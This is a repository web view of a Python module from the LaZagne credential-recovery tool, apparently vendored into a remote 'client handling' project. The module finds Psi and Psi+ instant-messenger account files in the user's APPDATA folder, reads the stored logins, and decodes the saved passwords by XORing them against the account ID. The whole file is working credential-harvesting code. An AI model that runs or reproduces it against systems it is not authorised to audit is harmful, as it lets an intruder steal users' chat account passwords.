summaryrefslogtreecommitdiff
path: root/foreign/client_handling/lazagne/softwares/chats/psi.py
blob: a2afdd7229a9b214db4550c8ea945c02cf5fb2fa (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
# -*- coding: utf-8 -*- 
import os
from xml.etree.cElementTree import ElementTree
from glob import glob
from itertools import cycle

from foreign.client_handling.lazagne.config.constant import constant
from foreign.client_handling.lazagne.config.module_info import ModuleInfo
from foreign.client_handling.lazagne.config.winstructure import char_to_int


class PSI(ModuleInfo):
    def __init__(self):
        self.pwd_found = []

        ModuleInfo.__init__(self, 'psi-im', 'chats')

    def get_profiles_files(self):
        _dirs = (
            u'psi\\profiles\\*\\accounts.xml',
            u'psi+\\profiles\\*\\accounts.xml',
        )

        for one_dir in _dirs:
            _path = os.path.join(constant.profile['APPDATA'], one_dir)
            accs_files = glob(_path)
            for one_file in accs_files:
                yield one_file

    # Thanks to https://github.com/jose1711/psi-im-decrypt
    def decode_password(self, password, jid):
        result = ''
        jid = cycle(jid)
        for n1 in range(0, len(password), 4):
            x = int(password[n1:n1 + 4], 16)
            result += chr(x ^ char_to_int(next(jid)))

        return result

    def process_one_file(self, _path):
        root = ElementTree(file=_path).getroot()

        for item in root:
            if item.tag == '{http://psi-im.org/options}accounts':
                for acc in item:
                    values = {}

                    for x in acc:
                        if x.tag == '{http://psi-im.org/options}jid':
                            values['Login'] = x.text

                        elif x.tag == '{http://psi-im.org/options}password':
                            values['Password'] = x.text

                    values['Password'] = self.decode_password(values['Password'], values['Login'])

                    if values:
                        self.pwd_found.append(values)

    def run(self):
        for one_file in self.get_profiles_files():
            self.process_one_file(one_file)

        return self.pwd_found